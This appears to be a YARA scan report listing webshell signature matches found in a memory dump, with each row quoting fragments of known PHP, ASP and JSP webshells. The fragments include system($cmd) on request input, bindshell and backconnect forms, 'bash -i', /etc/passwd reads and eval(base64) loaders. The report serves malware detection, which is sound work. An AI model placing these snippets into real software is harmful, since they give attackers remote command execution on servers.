| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_NGH | PHP Webshells Github Archive - file NGH.php | Florian Roth | - 0x40480:$s0: <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
- 0x404be:$s2: /* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
- 0x316c5:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x404fc:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x40535:$s9: <form action=<?=$script?>?act=backconnect method=POST>
- 0x40571:$s11: <form action=<?=$script?>?act=mkdir method=POST>
- 0x405a7:$s16: die("<font color=#DF0000>Login error</font>");
- 0x405db:$s20: <b>Bind /bin/bash at port: </b><input type=text name=port size=8>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_matamu | PHP Webshells Github Archive - file matamu.php | Florian Roth | - 0x406f4:$s2: $command .= ' -F';
- 0x4070b:$s3: /* We try and match a cd command. */
- 0x40734:$s4: directory... Trust me - it works :-) */
- 0x43f08:$s4: directory... Trust me - it works :-) */
- 0x40760:$s5: $command .= " 1> $tmpfile 2>&1; " .
- 0x40789:$s10: $new_dir = $regs[1]; // 'cd /something/...'
- 0x407ba:$s16: /* The last / in work_dir were the first charecter.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ru24_post_sh | PHP Webshells Github Archive - file ru24_post_sh.php | Florian Roth | - 0x408c3:$s1: http://www.ru24-team.net
- 0x37cb2:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x408e0:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x37c81:$s6: Ru24PostWebShell
- 0x40932:$s6: Ru24PostWebShell
- 0x37d04:$s7: Writed by DreAmeRz
- 0x40947:$s7: Writed by DreAmeRz
- 0x4095e:$s9: $function=passthru; // system, exec, cmd
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_hiddens_shell_v1 | PHP Webshells Github Archive - file hiddens shell v1.php | Florian Roth | - 0x35973:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x40a64:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_c99_madnet | PHP Webshells Github Archive - file c99_madnet.php | Florian Roth | - 0x40b86:$s0: $md5_pass = ""; //If no pass then hash
- 0x422ee:$s0: $md5_pass = ""; //If no pass then hash
- 0x240f3:$s1: eval(gzinflate(base64_decode('
- 0x24f45:$s1: eval(gzinflate(base64_decode('
- 0x312d2:$s1: eval(gzinflate(base64_decode('
- 0x3268d:$s1: eval(gzinflate(base64_decode('
- 0x40bb1:$s1: eval(gzinflate(base64_decode('
- 0x42319:$s1: eval(gzinflate(base64_decode('
- 0x40bd4:$s2: $pass = "pass"; //Pass
- 0x40bf0:$s3: $login = "user"; //Login
- 0x40c0d:$s4: //Authentication
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_c99_locus7s | PHP Webshells Github Archive - file c99_locus7s.php | Florian Roth | - 0x40cfe:$s8: $encoded = base64_encode(file_get_contents($d.$f));
- 0x40d37:$s9: $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y
- 0x40d82:$s10: else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sq
- 0x40dcd:$s11: $c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server
- 0x40e0f:$s19: $nixpwdperpage = 100; // Get first N lines from /etc/passwd
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_JspWebshell_1_2 | PHP Webshells Github Archive - file JspWebshell_1.2.php | Florian Roth | - 0x40f27:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x44417:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x40f66:$s1: String password=request.getParameter("password");
- 0x40f9c:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x44456:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x40fec:$s7: String editfile=request.getParameter("editfile");
- 0x41022:$s8: //String tempfilename=request.getParameter("file");
- 0x2a58f:$s12: password = (String)session.getAttribute("password");
- 0x4105b:$s12: password = (String)session.getAttribute("password");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_safe0ver | PHP Webshells Github Archive - file safe0ver.php | Florian Roth | - 0x4115d:$s3: $scriptident = "$scriptTitle By Evilc0der.com";
- 0x41191:$s4: while (file_exists("$lastdir/newfile$i.txt"))
- 0x411c3:$s5: else { /* Then it must be a File... --> */
- 0x411f7:$s7: $contents .= htmlentities( $line ) ;
- 0x41220:$s8: <br><p><br>Safe Mode ByPAss<p><form method="POST">
- 0x41258:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x46f1d:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x4129a:$s20: /* End of Actions --> */
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Uploader | PHP Webshells Github Archive - file Uploader.php | Florian Roth | - 0x328fe:$s1: move_uploaded_file($userfile, "entrika.php");
- 0x41385:$s1: move_uploaded_file($userfile, "entrika.php");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_kral | PHP Webshells Github Archive - file kral.php | Florian Roth | - 0x41487:$s1: $adres=gethostbyname($ip);
- 0x414a6:$s3: curl_setopt($ch,CURLOPT_POSTFIELDS,"domain=".$site);
- 0x414df:$s4: $ekle="/index.php?option=com_user&view=reset&layout=confirm";
- 0x41522:$s16: echo $son.' <br> <font color="green">Access</font><br>';
- 0x41560:$s17: <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br /
- 0x415aa:$s20: <p><strong>Server listeleyici</strong><br />
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_cgitelnet | PHP Webshells Github Archive - file cgitelnet.php | Florian Roth | - 0x416a6:$s9: # Author Homepage: http://www.rohitab.com/
- 0x416d6:$s10: elsif($Action eq "command") # user wants to run a command
- 0x41715:$s18: # in a command line on Windows NT.
- 0x4173d:$s20: print "Transfered $TargetFileSize Bytes.<br>";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_simple_backdoor | PHP Webshells Github Archive - file simple-backdoor.php | Florian Roth | - 0x33e57:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41847:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41f6e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41886:$s1: http://michaeldaw.org 2006 -->
- 0x41fad:$s1: http://michaeldaw.org 2006 -->
- 0x33e96:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418b6:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x41fdd:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418fb:$s3: echo "</pre>";
- 0x41916:$s4: $cmd = ($_REQUEST['cmd']);
- 0x4193d:$s5: echo "<pre>";
- 0x225b6:$s6: if(isset($_REQUEST['cmd'])){
- 0x41957:$s6: if(isset($_REQUEST['cmd'])){
- 0x42022:$s6: if(isset($_REQUEST['cmd'])){
- 0x41978:$s7: die;
- 0x41989:$s8: system($cmd);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 | PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x3f93c:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x41aae:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x41ae7:$s3: xb5@hotmail.com</FONT></CENTER></B>");
- 0x41b12:$s4: $v = @ini_get("open_basedir");
- 0x3f975:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x41b35:$s6: by PHP Emperor<xb5@hotmail.com>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_NTDaddy_v1_9 | PHP Webshells Github Archive - file NTDaddy v1.9.php | Florian Roth | - 0x41c2a:$s2: | -obzerve : mr_o@ihateclowns.com |
- 0x41c56:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x42457:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x41c88:$s13: <form action=ntdaddy.asp method=post>
- 0x41cb3:$s17: response.write("<ERROR: THIS IS NOT A TEXT FILE>")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_lamashell | PHP Webshells Github Archive - file lamashell.php | Florian Roth | - 0x41db5:$s0: if(($_POST['exe']) == "Execute") {
- 0x41ddc:$s8: $curcmd = $_POST['king'];
- 0x41dfb:$s16: "http://www.w3.org/TR/html4/loose.dtd">
- 0x41e28:$s18: <title>lama's'hell v. 3.0</title>
- 0x41e4f:$s19: _|_ O _ O _|_
- 0x41e6a:$s20: $curcmd = "ls -lah";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Simple_PHP_backdoor_by_DK | PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Florian Roth | - 0x33e57:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41847:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41f6e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41886:$s1: http://michaeldaw.org 2006 -->
- 0x41fad:$s1: http://michaeldaw.org 2006 -->
- 0x33e96:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418b6:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x41fdd:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x225b6:$s6: if(isset($_REQUEST['cmd'])){
- 0x41957:$s6: if(isset($_REQUEST['cmd'])){
- 0x42022:$s6: if(isset($_REQUEST['cmd'])){
- 0x225d7:$s8: system($cmd);
- 0x41991:$s8: system($cmd);
- 0x42043:$s8: system($cmd);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT | PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php | Florian Roth | - 0x42156:$s4: $content = chunk_split(base64_encode($content));
- 0x4218d:$s12: print "Sending mail to $to....... ";
- 0x421b8:$s16: if (!$from && !$subject && !$message && !$emaillist){
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_C99madShell_v__2_0_madnet_edition | PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php | Florian Roth | - 0x40b86:$s0: $md5_pass = ""; //If no pass then hash
- 0x422ee:$s0: $md5_pass = ""; //If no pass then hash
- 0x240f3:$s1: eval(gzinflate(base64_decode('
- 0x24f45:$s1: eval(gzinflate(base64_decode('
- 0x312d2:$s1: eval(gzinflate(base64_decode('
- 0x3268d:$s1: eval(gzinflate(base64_decode('
- 0x40bb1:$s1: eval(gzinflate(base64_decode('
- 0x42319:$s1: eval(gzinflate(base64_decode('
- 0x4233c:$s2: $pass = ""; //Pass
- 0x42354:$s3: $login = ""; //Login
- 0x24f21:$s4: //Authentication
- 0x40c1a:$s4: //Authentication
- 0x4236d:$s4: //Authentication
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_CmdAsp_asp_php | PHP Webshells Github Archive - file CmdAsp.asp.php.txt | Florian Roth | - 0x41c56:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x42457:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x42488:$s4: ' Author: Maceo <maceo @ dogmile.com>
- 0x424b2:$s5: ' -- Use a poor man's pipe ... a temp file -- '
- 0x424e6:$s6: ' --------------------o0o--------------------
- 0x42518:$s8: ' File: CmdAsp.asp
- 0x42530:$s11: <-- CmdAsp.asp -->
- 0x1c51b:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42594:$s16: Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
- 0x1c490:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_NCC_Shell | PHP Webshells Github Archive - file NCC-Shell.php | Florian Roth | - 0x426e2:$s0: if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
- 0x42726:$s1: <b>--Coded by Silver
- 0x4273f:$s2: <title>Upload - Shell/Datei</title>
- 0x42767:$s8: <a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b><
- 0x427b9:$s14: ~|_Team .:National Cracker Crew:._|~<br>
- 0x427e7:$s18: printf("Sie ist %u Bytes gro
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_README | PHP Webshells Github Archive - file README.md | Florian Roth | - 0x428da:$s0: Common php webshells. Do not host the file(s) in your server!
- 0x4291c:$s1: php-webshells
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_backupsql | PHP Webshells Github Archive - file backupsql.php | Florian Roth | - 0x429f9:$s0: $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" .
- 0x327f6:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x42a47:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x42a9b:$s2: * as email attachment, or send to a remote ftp server by
- 0x42ad9:$s16: * Neagu Mihai<neagumihai@hotmail.com>
- 0x42b04:$s17: $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_AK_74_Security_Team_Web_Shell_Beta_Version | PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php | Florian Roth | - 0x42c64:$s8: - AK-74 Security Team Web Site: www.ak74-team.net
- 0x42c9a:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.
- 0x42cf0:$s10: <b><font color=#83000>Execute system commands!</font></b>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_cpanel | PHP Webshells Github Archive - file cpanel.php | Florian Roth | - 0x42e01:$s0: function ftp_check($host,$user,$pass,$timeout){
- 0x42e35:$s3: curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- 0x42e6d:$s4: [ user@alturks.com ]# info<b><br><font face=tahoma><br>
- 0x42eaa:$s12: curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- 0x42ed9:$s13: Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir
- 0x42f2f:$s20: <br><b>Please enter your USERNAME and PASSWORD to logon<br>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_accept_language | PHP Webshells Github Archive - file accept_language.php | Florian Roth | - 0x43046:$s0: <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_529 | PHP Webshells Github Archive - file 529.php | Florian Roth | - 0x43163:$s0: <p>More: <a href="/">Md5Cracking.Com Crew</a>
- 0x43196:$s7: href="/" title="Securityhouse">Security House - Shell Center - Edited By Kin
- 0x431e7:$s9: echo '<PRE><P>This is exploit from <a
- 0x43213:$s10: This Exploit Was Edited By KingDefacer
- 0x4323f:$s13: safe_mode and open_basedir Bypass PHP 5.2.9
- 0x43271:$s14: $hardstyle = explode("/", $file);
- 0x43299:$s20: while($level--) chdir("..");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_STNC_WebShell_v0_8 | PHP Webshells Github Archive - file STNC WebShell v0.8.php | Florian Roth | - 0x43398:$s3: if(isset($_POST["action"])) $action = $_POST["action"];
- 0x433d4:$s8: elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()
- 0x43428:$s13: { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pw
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_tryag | PHP Webshells Github Archive - file tryag.php | Florian Roth | - 0x4354a:$s1: <title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
- 0x4358c:$s3: $tabledump = "DROP TABLE IF EXISTS $table;\n";
- 0x435c0:$s6: $string = !empty($_POST['string']) ? $_POST['string'] : 0;
- 0x43600:$s7: $tabledump .= "CREATE TABLE $table (\n";
- 0x4362f:$s14: echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_dC3_Security_Crew_Shell_PRiV_2 | PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php | Florian Roth | - 0x3dc6e:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x43776:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x437b3:$s9: header("Last-Modified: ".date("r",filemtime(__FILE__)));
- 0x437f1:$s13: header("Content-type: image/gif");
- 0x43819:$s14: @copy($file,$to) or die ("[-]Error copying file!");
- 0x3dd8a:$s20: if (isset($_GET['rename_all'])) {
- 0x43852:$s20: if (isset($_GET['rename_all'])) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_qsd_php_backdoor | PHP Webshells Github Archive - file qsd-php-backdoor.php | Florian Roth | - 0x43951:$s1: // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
- 0x439a6:$s2: if(isset($_POST["newcontent"]))
- 0x439ca:$s3: foreach($parts as $val)//Assemble the path back together
- 0x43a07:$s7: $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_spygrup | PHP Webshells Github Archive - file spygrup.php | Florian Roth | - 0x43b25:$s2: kingdefacer@msn.com</FONT></CENTER></B>");
- 0x43b54:$s6: if($_POST['root']) $root = $_POST['root'];
- 0x43b84:$s12: ".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>
- 0x43bd8:$s18: By KingDefacer From Spygrup.org>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Web_shell__c_ShAnKaR | PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php | Florian Roth | - 0x43cde:$s0: header("Content-Length: ".filesize($_POST['downf']));
- 0x43d18:$s5: if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump
- 0x43d6b:$s6: write("#\n#Server : ".getenv('SERVER_NAME')."
- 0x43d9e:$s12: foreach(@file($_POST['passwd']) as $fed)echo $fed;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz | PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php | Florian Roth | - 0x43ed4:$s7: <meta name="Copyright" content=TouCh By iJOo">
- 0x40734:$s11: directory... Trust me - it works :-) */
- 0x43f08:$s11: directory... Trust me - it works :-) */
- 0x43f35:$s15: /* ls looks much better with ' -F', IMHO. */
- 0x43f67:$s16: } else if ($command == 'ls') {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Gamma_Web_Shell | PHP Webshells Github Archive - file Gamma Web Shell.php | Florian Roth | - 0x44061:$s4: $ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
- 0x44096:$s8: ### Gamma Group <http://www.gammacenter.com>
- 0x440c8:$s15: my $error = "This command is not available in the restricted mode.\n";
- 0x44114:$s20: my $command = $self->query('command');
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_aspydrv | PHP Webshells Github Archive - file aspydrv.php | Florian Roth | - 0x44214:$s0: Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files
- 0x44263:$s1: nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
- 0x442a4:$s3: Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
- 0x442e7:$s17: If request.querystring("getDRVs")="@" then
- 0x44317:$s20: ' ---Copy Too Folder routine Start
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_JspWebshell_1_2_2 | PHP Webshells Github Archive - file JspWebshell 1.2.php | Florian Roth | - 0x40f27:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x44417:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x40f9c:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x44456:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x444a6:$s4: // String tempfilepath=request.getParameter("filepath");
- 0x444e4:$s15: endPoint=random1.getFilePointer();
- 0x4450c:$s20: if (request.getParameter("command") != null) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_g00nshell_v1_3 | PHP Webshells Github Archive - file g00nshell-v1.3.php | Florian Roth | - 0x44615:$s10: #To execute commands, simply include ?cmd=___ in the url. #
- 0x44656:$s15: $query = "SHOW COLUMNS FROM " . $_GET['table'];
- 0x4468b:$s16: $uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent
- 0x446d7:$s17: echo("<form method='GET' name='shell'>");
- 0x44706:$s18: echo("<form method='post' action='?act=sql'>");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_WinX_Shell | PHP Webshells Github Archive - file WinX Shell.php | Florian Roth | - 0x44807:$s4: // It's simple shell for all Win OS.
- 0x44830:$s5: //------- [netstat -an] and [ipconfig] and [tasklist] ------------
- 0x44877:$s6: <html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
- 0x448b9:$s13: // Created by greenwood from n57
- 0x448df:$s20: if (is_uploaded_file($userfile)) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_PHANTASMA | PHP Webshells Github Archive - file PHANTASMA.php | Florian Roth | - 0x449d3:$s12: " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
- 0x44a13:$s15: if ($portscan != "") {
- 0x44a2f:$s16: echo "<br>Banner: $get <br><br>";
- 0x44a56:$s20: $dono = get_current_user( );
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_cw | PHP Webshells Github Archive - file cw.php | Florian Roth | - 0x44b42:$s1: // Dump Database [pacucci.com]
- 0x44b65:$s2: $dump = "-- Database: ".$_POST['db'] ." \n";
- 0x44b96:$s7: $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
- 0x44be6:$s8: <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='htt
- 0x44c3a:$s14: $dump .= "-- Cyber-Warrior.Org\n";
- 0x44c62:$s20: if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_include_w_shell | PHP Webshells Github Archive - file php-include-w-shell.php | Florian Roth | - 0x44d80:$s13: # dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
- 0x44dc5:$s17: "phpshellapp" => "export TERM=xterm; bash -i",
- 0x44df9:$s19: else if($numhosts == 1) $strOutput .= "On 1 host..\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_mysql_tool | PHP Webshells Github Archive - file mysql_tool.php | Florian Roth | - 0x44f02:$s12: $dump .= "-- Dumping data for table '$table'\n";
- 0x44f38:$s20: $dump .= "CREATE TABLE $table (\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_PhpSpy_Ver_2006 | PHP Webshells Github Archive - file PhpSpy Ver 2006.php | Florian Roth | - 0x45037:$s2: var_dump(@$shell->RegRead($_POST['readregname']));
- 0x29112:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x4506f:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x450c2:$s19: $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32
- 0x45114:$s20: $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ZyklonShell | PHP Webshells Github Archive - file ZyklonShell.php | Florian Roth | - 0x45236:$s0: The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>
- 0x45289:$s1: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- 0x452c0:$s2: <TITLE>404 Not Found</TITLE>
- 0x452e1:$s3: <H1>Not Found</H1>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_myshell | PHP Webshells Github Archive - file myshell.php | Florian Roth | - 0x453cd:$s0: if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/outpu
- 0x3f3be:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x4541d:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x4546e:$s15: <title>$MyShellVersion - Access Denied</title>
- 0x454a2:$s16: }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTT
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_lolipop | PHP Webshells Github Archive - file lolipop.php | Florian Roth | - 0x455c8:$s3: $commander = $_POST['commander'];
- 0x455ef:$s9: $sourcego = $_POST['sourcego'];
- 0x45615:$s20: $result = mysql_query($loli12) or die (mysql_error());
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_simple_cmd | PHP Webshells Github Archive - file simple_cmd.php | Florian Roth | - 0x3906f:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x4571e:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x39048:$s2: <title>G-Security Webshell</title>
- 0x4575a:$s2: <title>G-Security Webshell</title>
- 0x390ab:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x45781:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x390db:$s6: <? $cmd = $_REQUEST["-cmd"];?>
- 0x457b1:$s6: <? $cmd = $_REQUEST["-cmd"];?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_go_shell | PHP Webshells Github Archive - file go-shell.php | Florian Roth | - 0x4589d:$s0: #change this password; for power security - delete this file =)
- 0x458e1:$s2: if (!defined$param{cmd}){$param{cmd}="ls -la"};
- 0x45916:$s11: open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
- 0x4594d:$s12: print << "[kalabanga]";
- 0x4596a:$s13: <title>GO.cgi</title>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_aZRaiLPhp_v1_0 | PHP Webshells Github Archive - file aZRaiLPhp v1.0.php | Florian Roth | - 0x45a59:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED
- 0x45aa8:$s4: $fileperm=base_convert($_POST['fileperm'],8,10);
- 0x45ade:$s19: touch ("$path/$dismi") or die("Dosya Olu
- 0x45b0c:$s20: echo "<div align=left><a href='./$this_file?dir=$path/$file'>G
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_webshells_zehir4 | Webshells Github Archive - file zehir4 | Florian Roth | - 0x45c1c:$s0: frames.byZehir.document.execCommand(command, false, option);
- 0x45c5d:$s8: response.Write "<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com
|
